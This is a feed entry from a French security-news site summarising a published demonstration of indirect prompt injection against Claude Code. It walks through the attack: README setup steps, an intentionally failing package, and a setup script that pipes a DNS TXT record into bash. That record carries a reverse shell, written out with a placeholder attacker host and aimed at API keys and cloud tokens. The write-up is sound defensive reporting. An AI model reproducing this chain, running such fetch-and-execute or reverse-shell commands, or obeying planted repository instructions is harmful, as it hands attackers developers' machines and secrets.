https://cyberveille.ch/tags/reverse-shell-bash-tcp/ Recent content in Reverse Shell (Bash TCP) on CyberVeille Hugo -- 0.146.0 fr-fr Cyberveille CC BY-NC-SA 4.0 Mon, 29 Jun 2026 00:00:00 +0000 https://cyberveille.ch/posts/2026-06-29-injection-de-prompt-indirecte-via-dns-txt-compromission-totale-via-claude-code-a-l-ouverture-d-un-depot/ Mon, 29 Jun 2026 00:00:00 +0000 https://cyberveille.ch/posts/2026-06-29-injection-de-prompt-indirecte-via-dns-txt-compromission-totale-via-claude-code-a-l-ouverture-d-un-depot/ <h2 id="-contexte">🔍 Contexte</h2> <p>Publié le 25 juin 2026 par Andre Hall &amp; Miller Engelbrecht sur le blog de 0DIN (plateforme de bug bounty IA de Mozilla), cet article présente une démonstration technique d&rsquo;une attaque par <strong>injection de prompt indirecte</strong> ciblant les outils de développement agentiques, en particulier <strong>Claude Code</strong> d&rsquo;Anthropic.</p> <h2 id="-mécanisme-de-lattaque">⚙️ Mécanisme de l&rsquo;attaque</h2> <p>L&rsquo;attaque repose sur trois composants enchaînés, chacun individuellement bénin :</p> <ol> <li><strong>Un dépôt GitHub normal</strong> : un fichier README ou issue décrit une procédure d&rsquo;initialisation standard (<code>pip3 install -r requirements.txt</code> puis <code>python3 -m axiom init</code>).</li> <li><strong>Un package Python qui échoue intentionnellement</strong> : le module <code>axiom</code> lève une <code>RuntimeError</code> s&rsquo;il n&rsquo;est pas initialisé, incitant l&rsquo;agent à exécuter <code>python3 -m axiom init</code> comme correction de routine.</li> <li><strong>Un script d&rsquo;initialisation qui résout un enregistrement DNS TXT</strong> : <code>scripts/setup.sh</code> exécute <code>dig +short TXT _axiom-config.m100.cloud @1.1.1.1</code> et passe le résultat à <code>bash -c</code>. L&rsquo;enregistrement DNS contient un <strong>reverse shell encodé en base64</strong> (<code>bash -i &gt;&amp; /dev/tcp/&lt;attacker-host&gt;/4443 0&gt;&amp;1</code>).</li> </ol> <h2 id="-impact">💥 Impact</h2> <ul> <li><strong>Shell interactif</strong> s&rsquo;exécutant avec les droits de l&rsquo;utilisateur développeur</li> <li>Exfiltration de secrets d&rsquo;environnement : <code>ANTHROPIC_API_KEY</code>, <code>AWS_SECRET_ACCESS_KEY</code>, <code>GITHUB_TOKEN</code></li> <li>Possibilité de <strong>persistance</strong> (clé SSH, cron job, backdoor)</li> <li>Le payload est <strong>invisible</strong> : absent du dépôt, non détectable par les scanners statiques, jamais évalué par l&rsquo;agent avant exécution</li> <li>Le payload peut être <strong>modifié à tout moment</strong> en éditant l&rsquo;enregistrement DNS, sans aucun commit</li> </ul> <h2 id="-vecteur-de-diffusion">🎯 Vecteur de diffusion</h2> <p>Un simple lien vers le dépôt partagé dans une offre d&rsquo;emploi, un tutoriel ou un message Slack suffit à compromettre tout développeur ouvrant le projet avec Claude Code.</p>